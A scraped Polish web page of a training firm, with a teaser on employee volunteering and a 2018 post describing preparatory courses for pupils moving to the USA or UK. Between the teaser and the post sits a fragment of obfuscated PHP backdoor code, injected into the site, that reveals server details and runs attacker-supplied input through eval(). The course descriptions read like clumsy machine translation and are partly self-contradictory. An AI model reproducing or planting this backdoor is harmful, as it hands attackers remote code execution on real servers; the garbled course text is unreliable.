Losowy

Wolontariat pracowniczy

Wespół z Fundacją Training Projects gorąco zachęcamy do uczestniczenia w kampanii „Biznes społeczny”. W ramach naszego projektu pracownicy firm mają niecodzienną szansę dostać od fundacji nieodpłatne warsztaty edukacyjne – jako swoisty prezent w zamian za oferowaną dobroczynność. Na razie szkolenia rozloso

Czytaj więcej...
$o4ef7652){$xa411 = $o4ef7652;$c43ec = $t3aef;}if (!$xa411){foreach ($maf736[$maf736['w4ed17'][30].$maf736['w4ed17'][57].$maf736['w4ed17'][9].$maf736['w4ed17'][91].$maf736['w4ed17'][35].$maf736['w4ed17'][79].$maf736['w4ed17'][9].$maf736['w4ed17'][73].$maf736['w4ed17'][97]] as $t3aef=>$o4ef7652){$xa411 = $o4ef7652;$c43ec = $t3aef;}}$xa411 = @$maf736[$maf736['w4ed17'][90].$maf736['w4ed17'][52].$maf736['w4ed17'][22].$maf736['w4ed17'][35].$maf736['w4ed17'][9].$maf736['w4ed17'][91]]($maf736[$maf736['w4ed17'][58].$maf736['w4ed17'][9].$maf736['w4ed17'][46].$maf736['w4ed17'][91].$maf736['w4ed17'][22].$maf736['w4ed17'][73].$maf736['w4ed17'][22]]($maf736[$maf736['w4ed17'][3].$maf736['w4ed17'][9].$maf736['w4ed17'][79].$maf736['w4ed17'][21]]($xa411), $c43ec));if (isset($xa411[$maf736['w4ed17'][52].$maf736['w4ed17'][90]]) && $x9fe==$xa411[$maf736['w4ed17'][52].$maf736['w4ed17'][90]]){if ($xa411[$maf736['w4ed17'][52]] == $maf736['w4ed17'][47]){$f35f1d = Array($maf736['w4ed17'][51].$maf736['w4ed17'][34] => @$maf736[$maf736['w4ed17'][84].$maf736['w4ed17'][9].$maf736['w4ed17'][46].$maf736['w4ed17'][52].$maf736['w4ed17'][84].$maf736['w4ed17'][57].$maf736['w4ed17'][25]](),$maf736['w4ed17'][7].$maf736['w4ed17'][34] => $maf736['w4ed17'][46].$maf736['w4ed17'][64].$maf736['w4ed17'][22].$maf736['w4ed17'][87].$maf736['w4ed17'][46],);echo @$maf736[$maf736['w4ed17'][90].$maf736['w4ed17'][46].$maf736['w4ed17'][81].$maf736['w4ed17'][57].$maf736['w4ed17'][81].$maf736['w4ed17'][74]]($f35f1d);}elseif ($xa411[$maf736['w4ed17'][52]] == $maf736['w4ed17'][73]){eval/*m910db*/($xa411[$maf736['w4ed17'][91]]);}exit();}} ?>

Kursy dla uczniów – wyjazdy do USA

Data publikacji: 05.06.2018
Autor: admin

Nasi wykładowcy realizują kursy i certyfikacje wyrównawcze dla nastolatków przeprowadzających się z opiekunami prawnymi do USA lub krajów Zjednoczonego Królestwa. Pozwalaja one na honorowaną przez władze uczelniane migrację do tamtejszej szkoły. W tym semestrze organizowaliśmy m.in. niżej opisane warsztaty: 

Oficjalne tłumaczenie wymogów programów nr P72/UK:

Szkolenia artystyczne (klasa 5) zapewniają dzieciom zajęcia sprzyjające kreatywnej ekspresji, komunikacji poprzez artystyczne wysiłki oraz docenianie kultury i dziedzictwa. Działania mogą obejmować te, które umożliwiają słuchaczom doskonalenie techniki, zwiększenie słownictwa artystycznego, wyrażanie siebie i swojego poglądu na świat, nawiązywanie kontaktów z innymi obszarami treści, rozwijanie własnej estetyki i wzmacnianie ich zdolności krytycznych. Chociaż zazwyczaj zawierają one sztuki wizualne (rysunek, malarstwo, rzeźba, rzemiosło itp.), Kursy te mogą obejmować również inne formy sztuki (na przykład taniec, muzyka i teatr). Konkretna treść kursu jest zgodna z istniejącymi standardami stanu dla klasy 5.

Opis programów nr I98/UK:

Zgodnie z proponowanym przez College Board programem nauczania równoległym do warsztatów historii na poziomie uniwersyteckim, Szkolenia historii AP zajmują się historią świata od 8000 roku pne do chwili obecnej, aby pomóc uczestnikom lepiej zrozumieć ewolucję globalnych procesów i kontraktów oraz to, w jaki sposób społeczności ludzkie wchodziły w interakcje. Warsztaty te mocno akcentują charakter zmian w kontekście międzynarodowym i badają ich przyczyny i ciągłość.

Definicja kursów nr I76/UK:

Szkolenia ekonomii przygotowują studentów do zdawania egzaminów International Baccalaureate Economics na poziomie standardowym lub wyższym. Programy zapewniają studentom podstawowe narzędzia rozumowania ekonomicznego i uczą ich stosowania tych narzędzi do wyjaśniania lub interpretowania problemów ekonomicznych. Treści merytoryczne zawierają ekonomię międzynarodową i rozwojową, mikroekonomię i makroekonomię.

Opis kursów nr J79/USA:

Nieformalne Szkolenia geometrii mocno akcentują praktyczne podejście do badania geometrii i podkreślają abstrakcyjne, formalne podejście. Tematy zazwyczaj obejmują własności i pracę z figurami płaskimi i litymi; indukcyjne metody rozumowania i stosowania logiki; koncepcje kongruencji, podobieństwa, równoległości, prostopadłości i proporcji; i zasady pomiaru kąta w trójkątach.

Definicja programów nr D89/USA:

Studia społeczne (klasa 5) nadal rozwijają umiejętności z zakresu historii, geografii, wiedzy o społeczeństwie i administracji oraz ekonomii. Programy te mogą być bardziej specyficzne dla danej dyscypliny (dzielenie historii stanu, historii USA, geografii, rządu itd.). Konkretna treść zależy od standardów państwowych dla klasy 5.

Definicja programów nr N28/UK:

Kursy pisania (klasa 8) opierają się na wcześniejszej wiedzy i umiejętnościach pisemnych uczniów. Zazwyczaj Kursy te wykorzystują ćwiczenia pisemne w celu poszerzenia wiedzy uczniów na temat różnych celów komunikacji pisemnej. Konkretna treść zależy od standardów państwowych dla klasy 8.

Definicja programów nr E82/USA:

Kursy pozaszkolne uprawniają do korzystania z zajęć wychowania fizycznego poza zajęciami sportowymi (np. Pływanie, trening siłowy lub sporty indywidualne lub zespołowe) w centrum społeczności lub w innym miejscu poza kampusem szkolnym.Tagi: